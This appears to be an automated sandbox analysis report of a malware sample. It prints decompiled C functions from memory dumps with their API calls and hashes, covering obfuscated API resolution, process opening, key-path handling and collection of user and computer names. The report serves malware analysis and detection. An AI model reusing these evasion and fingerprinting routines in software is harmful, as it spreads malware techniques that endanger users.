                                                                                                                                                                                                                                • Instruction ID: 7bdf145583aa1cf3ba67a67d59ff94243f10d27175b5ce11f3f1b6ed22d81f1d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f14e7bf0ff1fc24e8526ffc98057678d78a3e92e03d8d161298df9e20ad8020
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04413336A0060AAFDF01DFF8D8456AEB7F5EF49310F144566EA10EB150DA719D06CB91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A96856(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                				intOrPtr _t23;
                                                                                                                                                                                                                                				intOrPtr _t26;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                				intOrPtr _t30;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                				intOrPtr _t33;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t35;
                                                                                                                                                                                                                                				intOrPtr _t36;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t38;
                                                                                                                                                                                                                                				intOrPtr _t39;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t41;
                                                                                                                                                                                                                                				intOrPtr _t44;
                                                                                                                                                                                                                                				struct HINSTANCE__* _t48;
                                                                                                                                                                                                                                				intOrPtr _t54;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t54 = E00A95157(0x20);
                                                                                                                                                                                                                                				if(_t54 == 0) {
                                                                                                                                                                                                                                					_v8 = 8;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t23 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                					_t1 = _t23 + 0xa9e11a; // 0x4c44544e
                                                                                                                                                                                                                                					_t48 = GetModuleHandleA(_t1);
                                                                                                                                                                                                                                					_t26 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                					_t2 = _t26 + 0xa9e782; // 0x7243775a
                                                                                                                                                                                                                                					_v8 = 0x7f;
                                                                                                                                                                                                                                					_t28 = GetProcAddress(_t48, _t2);
                                                                                                                                                                                                                                					 *(_t54 + 0xc) = _t28;
                                                                                                                                                                                                                                					if(_t28 == 0) {
                                                                                                                                                                                                                                						L8:
                                                                                                                                                                                                                                						E00A953BB(_t54);
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t30 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                						_t5 = _t30 + 0xa9e76f; // 0x614d775a
                                                                                                                                                                                                                                						_t32 = GetProcAddress(_t48, _t5);
                                                                                                                                                                                                                                						 *(_t54 + 0x10) = _t32;
                                                                                                                                                                                                                                						if(_t32 == 0) {
                                                                                                                                                                                                                                							goto L8;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t33 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                							_t7 = _t33 + 0xa9e4ce; // 0x6e55775a
                                                                                                                                                                                                                                							_t35 = GetProcAddress(_t48, _t7);
                                                                                                                                                                                                                                							 *(_t54 + 0x14) = _t35;
                                                                                                                                                                                                                                							if(_t35 == 0) {
                                                                                                                                                                                                                                								goto L8;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t36 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                								_t9 = _t36 + 0xa9e406; // 0x4e6c7452
                                                                                                                                                                                                                                								_t38 = GetProcAddress(_t48, _t9);
                                                                                                                                                                                                                                								 *(_t54 + 0x18) = _t38;
                                                                                                                                                                                                                                								if(_t38 == 0) {
                                                                                                                                                                                                                                									goto L8;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									_t39 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                									_t11 = _t39 + 0xa9e792; // 0x6c43775a
                                                                                                                                                                                                                                									_t41 = GetProcAddress(_t48, _t11);
                                                                                                                                                                                                                                									 *(_t54 + 0x1c) = _t41;
                                                                                                                                                                                                                                									if(_t41 == 0) {
                                                                                                                                                                                                                                										goto L8;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                                                                                                                                                                                                										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                                                                                                                                                                                                										_t44 = E00A95C55(_t54, _a8);
                                                                                                                                                                                                                                										_v8 = _t44;
                                                                                                                                                                                                                                										if(_t44 != 0) {
                                                                                                                                                                                                                                											goto L8;
                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                											 *_a12 = _t54;
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _v8;
                                                                                                                                                                                                                                			}



















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A95157: RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00A974C1,?,00000001,?,?,00000000,00000000), ref: 00A9687B
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 00A9689D
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 00A968B3
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00A968C9
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00A968DF
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00A968F5
                                                                                                                                                                                                                                  • Part of subcall function 00A95C55: memset.NTDLL ref: 00A95CD4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$AllocateHandleHeapModulememset
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1886625739-0
                                                                                                                                                                                                                                • Opcode ID: b9b8a30dccbc6c8bb5a9488e8939c46e43d3f21e77318dbbb93197b004c78c74
                                                                                                                                                                                                                                • Instruction ID: 186257dcb2eeb738320e60338f191f8c9483f422970a10293c6e7c7e55f158da
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9b8a30dccbc6c8bb5a9488e8939c46e43d3f21e77318dbbb93197b004c78c74
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F211BB5B0060AAFDB11DFA9DD84EAABBFCEF043547014466E546C7211EB70E906CBB0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 88%
                                                                                                                                                                                                                                			E00A94847(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                                                				signed int* _v16;
                                                                                                                                                                                                                                				char _v284;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				char* _t59;
                                                                                                                                                                                                                                				intOrPtr* _t60;
                                                                                                                                                                                                                                				intOrPtr _t64;
                                                                                                                                                                                                                                				char _t65;
                                                                                                                                                                                                                                				intOrPtr _t68;
                                                                                                                                                                                                                                				intOrPtr _t69;
                                                                                                                                                                                                                                				intOrPtr _t71;
                                                                                                                                                                                                                                				void* _t73;
                                                                                                                                                                                                                                				signed int _t81;
                                                                                                                                                                                                                                				void* _t91;
                                                                                                                                                                                                                                				void* _t92;
                                                                                                                                                                                                                                				char _t98;
                                                                                                                                                                                                                                				signed int* _t100;
                                                                                                                                                                                                                                				intOrPtr* _t101;
                                                                                                                                                                                                                                				void* _t102;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t92 = __ecx;
                                                                                                                                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                				_t98 = _a16;
                                                                                                                                                                                                                                				if(_t98 == 0) {
                                                                                                                                                                                                                                					__imp__( &_v284,  *0xa9d37c);
                                                                                                                                                                                                                                					_t91 = 0x80000002;
                                                                                                                                                                                                                                					L6:
                                                                                                                                                                                                                                					_t59 = E00A93037( &_v284,  &_v284);
		_a8 = _t59;
		if(_t59 == 0) {
			_v8 = 8;
			L29:
			_t60 = _a20;
			if(_t60 != 0) {
				 *_t60 =  *_t60 + 1;
			}
			return _v8;
		}
		_t101 = _a24;
		if(E00A92B5D(_t92, _t97, _t101, _t91, _t59) != 0) {
			L27:
			E00A953BB(_a8);
			goto L29;
		}
		_t64 =  *0xa9d2b0; // 0x4fd9bb8
		_t16 = _t64 + 0xc; // 0x4fd9c86
		_t65 = E00A93037(_t64,  *_t16);
		_a24 = _t65;
		if(_t65 == 0) {
			L14:
			_t29 = _t101 + 0x14; // 0x102
			_t33 = _t101 + 0x10; // 0x3d00a9c0
			if(E00A99BAF(_t97,  *_t33, _t91, _a8,  *0xa9d374,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
				_t68 =  *0xa9d2e0; // 0x453a5a8
				if(_t98 == 0) {
					_t35 = _t68 + 0xa9ea48; // 0x4d4c4b48
					_t69 = _t35;
				} else {
					_t34 = _t68 + 0xa9ea43; // 0x55434b48
					_t69 = _t34;
				}
				if(E00A95E8A(_t69,  *0xa9d374,  *0xa9d378,  &_a24,  &_a16) == 0) {
					if(_t98 == 0) {
						_t71 =  *0xa9d2e0; // 0x453a5a8
						_t44 = _t71 + 0xa9e83e; // 0x74666f53
						_t73 = E00A93037(_t44, _t44);
						_t99 = _t73;
						if(_t73 == 0) {
							_v8 = 8;
						} else {
							_t47 = _t101 + 0x10; // 0x3d00a9c0
							E00A99BED( *_t47, _t91, _a8,  *0xa9d378, _a24);
							_t49 = _t101 + 0x10; // 0x3d00a9c0
							E00A99BED( *_t49, _t91, _t99,  *0xa9d370, _a16);
							E00A953BB(_t99);
						}
					} else {
						_t40 = _t101 + 0x10; // 0x3d00a9c0
						E00A99BED( *_t40, _t91, _a8,  *0xa9d378, _a24);
						_t43 = _t101 + 0x10; // 0x3d00a9c0
						E00A99BED( *_t43, _t91, _a8,  *0xa9d370, _a16);
					}
					if( *_t101 != 0) {
						E00A953BB(_a24);
					} else {
						 *_t101 = _a16;
					}
				}
			}
			goto L27;
		}
		_t21 = _t101 + 0x10; // 0x3d00a9c0
		_t81 = E00A963D1( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
		if(_t81 == 0) {
			_t100 = _v16;
			if(_v12 == 0x28) {
				 *_t100 =  *_t100 & _t81;
				_t26 = _t101 + 0x10; // 0x3d00a9c0
				E00A99BAF(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
			}
			E00A953BB(_t100);
			_t98 = _a16;
		}
		E00A953BB(_a24);
		goto L14;
	}
	if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
		goto L29;
	} else {
		_t97 = _a8;
		E00A9A929(_t98, _a8,  &_v284);
		__imp__(_t102 + _t98 - 0x117,  *0xa9d37c);
		 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
		_t91 = 0x80000003;
		goto L6;
	}
}
                                                                                                                                                                                                                                0x00a949da
                                                                                                                                                                                                                                0x00a949dd
                                                                                                                                                                                                                                0x00a949dd
                                                                                                                                                                                                                                0x00a94a35
                                                                                                                                                                                                                                0x00a94a41
                                                                                                                                                                                                                                0x00a94a37
                                                                                                                                                                                                                                0x00a94a3a
                                                                                                                                                                                                                                0x00a94a3a
                                                                                                                                                                                                                                0x00a94a35
                                                                                                                                                                                                                                0x00a949ae
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a94975
                                                                                                                                                                                                                                0x00a9491e
                                                                                                                                                                                                                                0x00a94921
                                                                                                                                                                                                                                0x00a94928
                                                                                                                                                                                                                                0x00a9492e
                                                                                                                                                                                                                                0x00a94931
                                                                                                                                                                                                                                0x00a94933
                                                                                                                                                                                                                                0x00a9493f
                                                                                                                                                                                                                                0x00a94942
                                                                                                                                                                                                                                0x00a94942
                                                                                                                                                                                                                                0x00a94948
                                                                                                                                                                                                                                0x00a9494d
                                                                                                                                                                                                                                0x00a9494d
                                                                                                                                                                                                                                0x00a94953
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a94953
                                                                                                                                                                                                                                0x00a94861
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a94888
                                                                                                                                                                                                                                0x00a94888
                                                                                                                                                                                                                                0x00a94894
                                                                                                                                                                                                                                0x00a948a7
                                                                                                                                                                                                                                0x00a948ad
                                                                                                                                                                                                                                0x00a948b5
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a948b5

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • StrChrA.SHLWAPI(00A951FC,0000005F,00000000,00000000,00000104), ref: 00A9487A
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(?,?), ref: 00A948A7
                                                                                                                                                                                                                                  • Part of subcall function 00A93037: lstrlen.KERNEL32(?,00000000,04FD9BB8,00000000,00A96F37,04FD9D96,?,?,?,?,?,69B25F44,00000005,00A9D00C), ref: 00A9303E
                                                                                                                                                                                                                                  • Part of subcall function 00A93037: mbstowcs.NTDLL ref: 00A93067
                                                                                                                                                                                                                                  • Part of subcall function 00A93037: memset.NTDLL ref: 00A93079
                                                                                                                                                                                                                                  • Part of subcall function 00A99BED: lstrlenW.KERNEL32(?,?,?,00A94A10,3D00A9C0,80000002,00A951FC,00A92DE9,74666F53,4D4C4B48,00A92DE9,?,3D00A9C0,80000002,00A951FC,?), ref: 00A99C12
                                                                                                                                                                                                                                  • Part of subcall function 00A953BB: RtlFreeHeap.NTDLL(00000000,00000000,00A912FA,00000000,?,?,00000000), ref: 00A953C7
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00A948C9
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                                                                                                                                                                                                • String ID: ($\
                                                                                                                                                                                                                                • API String ID: 3924217599-1512714803
                                                                                                                                                                                                                                • Opcode ID: f0ede71a3e9877f702294af9e1caf80ade7e613dbfba7fc95d5b5e0a3d923191
                                                                                                                                                                                                                                • Instruction ID: 3dab7ba27c5f4ce82ca6676a9928b229c7258665757965556e618d677688ec63
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f0ede71a3e9877f702294af9e1caf80ade7e613dbfba7fc95d5b5e0a3d923191
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1351687220060AAFDF12DFA4DE41EAB37F9BB08344F108519FA1596521EB36DA669B10
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A61D65() {
                                                                                                                                                                                                                                				void* _t1;
                                                                                                                                                                                                                                				unsigned int _t3;
                                                                                                                                                                                                                                				void* _t4;
                                                                                                                                                                                                                                				long _t5;
                                                                                                                                                                                                                                				void* _t6;
                                                                                                                                                                                                                                				intOrPtr _t10;
                                                                                                                                                                                                                                				void* _t14;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t10 =  *0xa641b0;
                                                                                                                                                                                                                                				_t1 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                				 *0xa641bc = _t1;
                                                                                                                                                                                                                                				if(_t1 == 0) {
                                                                                                                                                                                                                                					return GetLastError();
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t3 = GetVersion();
                                                                                                                                                                                                                                				if(_t3 != 5) {
                                                                                                                                                                                                                                					L4:
                                                                                                                                                                                                                                					if(_t14 <= 0) {
                                                                                                                                                                                                                                						_t4 = 0x32;
                                                                                                                                                                                                                                						return _t4;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						goto L5;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					if(_t3 >> 8 > 0) {
                                                                                                                                                                                                                                						L5:
                                                                                                                                                                                                                                						 *0xa641ac = _t3;
                                                                                                                                                                                                                                						_t5 = GetCurrentProcessId();
                                                                                                                                                                                                                                						 *0xa641a8 = _t5;
                                                                                                                                                                                                                                						 *0xa641b0 = _t10;
                                                                                                                                                                                                                                						_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                                                                                                                                                                                						 *0xa641a4 = _t6;
                                                                                                                                                                                                                                						if(_t6 == 0) {
                                                                                                                                                                                                                                							 *0xa641a4 =  *0xa641a4 | 0xffffffff;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						return 0;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t14 = _t3 - _t3;
                                                                                                                                                                                                                                						goto L4;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}










                                                                                                                                                                                                                                0x00a61db8
                                                                                                                                                                                                                                0x00a61dbe
                                                                                                                                                                                                                                0x00a61dc5
                                                                                                                                                                                                                                0x00a61dc7
                                                                                                                                                                                                                                0x00a61dc7
                                                                                                                                                                                                                                0x00a61dd1
                                                                                                                                                                                                                                0x00a61d96
                                                                                                                                                                                                                                0x00a61d96
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a61d96
                                                                                                                                                                                                                                0x00a61d94

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00A61577), ref: 00A61D74
                                                                                                                                                                                                                                • GetVersion.KERNEL32 ref: 00A61D83
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00A61D9F
                                                                                                                                                                                                                                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00A61DB8
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                                                                                                                • String ID: @Mxt MxtTxt
                                                                                                                                                                                                                                • API String ID: 845504543-1084903527
                                                                                                                                                                                                                                • Opcode ID: 77cf256ab50466190469c0a084a28c227d81d0e3bb979450855f53bfe81c0638
                                                                                                                                                                                                                                • Instruction ID: 59971e6be7642c98a3e51879939be84e74ca8b16dd47568e1a2e484ae7de98d0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77cf256ab50466190469c0a084a28c227d81d0e3bb979450855f53bfe81c0638
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38F03C72A44301EBEB10DBE9BC057553FB4E71B711F054625E605D61E0E7F085C78B54
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                                                                                                			E00A97095() {
                                                                                                                                                                                                                                				void* _v0;
                                                                                                                                                                                                                                				void** _t3;
                                                                                                                                                                                                                                				void** _t5;
                                                                                                                                                                                                                                				void** _t7;
                                                                                                                                                                                                                                				void** _t8;
                                                                                                                                                                                                                                				void* _t10;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t3 =  *0xa9d364; // 0x4fd95b0
                                                                                                                                                                                                                                				__imp__( &(_t3[0x10]));
                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                					_t5 =  *0xa9d364; // 0x4fd95b0
                                                                                                                                                                                                                                					_t1 =  &(_t5[0x16]); // 0x0
                                                                                                                                                                                                                                					if( *_t1 == 0) {
                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					Sleep(0xa);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t7 =  *0xa9d364; // 0x4fd95b0
                                                                                                                                                                                                                                				_t10 =  *_t7;
                                                                                                                                                                                                                                				if(_t10 != 0 && _t10 != 0xa9e823) {
                                                                                                                                                                                                                                					HeapFree( *0xa9d270, 0, _t10);
                                                                                                                                                                                                                                					_t7 =  *0xa9d364; // 0x4fd95b0
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				 *_t7 = _v0;
                                                                                                                                                                                                                                				_t8 =  &(_t7[0x10]);
                                                                                                                                                                                                                                				__imp__(_t8);
                                                                                                                                                                                                                                				return _t8;
                                                                                                                                                                                                                                			}










                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(04FD9570), ref: 00A9709E
                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A,?,00A95884), ref: 00A970A8
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,00A95884), ref: 00A970D6
                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(04FD9570), ref: 00A970EB
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 58946197-1536154274
                                                                                                                                                                                                                                • Opcode ID: 0798a2784f97cda46f309be732723d525485e1256fd07a86c9cc370140ed96eb
                                                                                                                                                                                                                                • Instruction ID: 1e4bfc705640dd12d0c9e1ee1a34db3a407038ecc4d6d65cdeb36851cdc3e10f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0798a2784f97cda46f309be732723d525485e1256fd07a86c9cc370140ed96eb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3BF0D4B4718200DFEF18CBE4EE9AF1A37E4BB05711F44401AE502CB360CB30AC82DA21
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A96706() {
                                                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                                                				long _v12;
                                                                                                                                                                                                                                				int _v16;
                                                                                                                                                                                                                                				long _t39;
                                                                                                                                                                                                                                				long _t43;
                                                                                                                                                                                                                                				signed int _t47;
                                                                                                                                                                                                                                				short _t51;
                                                                                                                                                                                                                                				signed int _t52;
                                                                                                                                                                                                                                				int _t56;
                                                                                                                                                                                                                                				int _t57;
                                                                                                                                                                                                                                				char* _t64;
                                                                                                                                                                                                                                				short* _t67;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                                                				GetUserNameW(0,  &_v8);
                                                                                                                                                                                                                                				_t39 = _v8;
                                                                                                                                                                                                                                				if(_t39 != 0) {
                                                                                                                                                                                                                                					_v12 = _t39;
                                                                                                                                                                                                                                					_v8 = 0;
                                                                                                                                                                                                                                					GetComputerNameW(0,  &_v8);
                                                                                                                                                                                                                                					_t43 = _v8;
                                                                                                                                                                                                                                					if(_t43 != 0) {
                                                                                                                                                                                                                                						_v12 = _v12 + _t43 + 2;
                                                                                                                                                                                                                                						_t64 = E00A95157(_v12 + _t43 + 2 << 2);
                                                                                                                                                                                                                                						if(_t64 != 0) {
                                                                                                                                                                                                                                							_t47 = _v12;
                                                                                                                                                                                                                                							_t67 = _t64 + _t47 * 2;
                                                                                                                                                                                                                                							_v8 = _t47;
                                                                                                                                                                                                                                							if(GetUserNameW(_t67,  &_v8) == 0) {
                                                                                                                                                                                                                                								L7:
                                                                                                                                                                                                                                								E00A953BB(_t64);
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t51 = 0x40;
                                                                                                                                                                                                                                								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                                                                                                                                                                                                                								_t52 = _v8;
                                                                                                                                                                                                                                								_v12 = _v12 - _t52;
                                                                                                                                                                                                                                								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                                                                                                                                                                                                                									goto L7;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									_t56 = _v12 + _v8;
                                                                                                                                                                                                                                									_t31 = _t56 + 2; // 0xa9a626
                                                                                                                                                                                                                                									_v12 = _t56;
                                                                                                                                                                                                                                									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                                                                                                                                                                                                                									_v8 = _t57;
                                                                                                                                                                                                                                									if(_t57 == 0) {
                                                                                                                                                                                                                                										goto L7;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										_t64[_t57] = 0;
                                                                                                                                                                                                                                										_v16 = _t64;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _v16;
                                                                                                                                                                                                                                			}
















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetUserNameW.ADVAPI32(00000000,00A9A624), ref: 00A9671A
                                                                                                                                                                                                                                • GetComputerNameW.KERNEL32(00000000,00A9A624), ref: 00A96736
                                                                                                                                                                                                                                  • Part of subcall function 00A95157: RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                • GetUserNameW.ADVAPI32(00000000,00A9A624), ref: 00A96770
                                                                                                                                                                                                                                • GetComputerNameW.KERNEL32(00A9A624,?), ref: 00A96793
                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00A9A624,00000000,00A9A626,00000000,00000000,?,?,00A9A624), ref: 00A967B6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3850880919-0
                                                                                                                                                                                                                                • Opcode ID: ccf47f12b2d48c2d5c58757a08bbe4396d61fb97564b342f6ec2201bae54dd01
                                                                                                                                                                                                                                • Instruction ID: 5b935811ff28a26e898a297b515dda879b36a2fc36ef36525cb9c89fcd1adf0d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ccf47f12b2d48c2d5c58757a08bbe4396d61fb97564b342f6ec2201bae54dd01
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E521A776A00618FFDB11DFE5C989DAEBBF8AF44744B5044AAE502E7200DB349A45DB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 56%
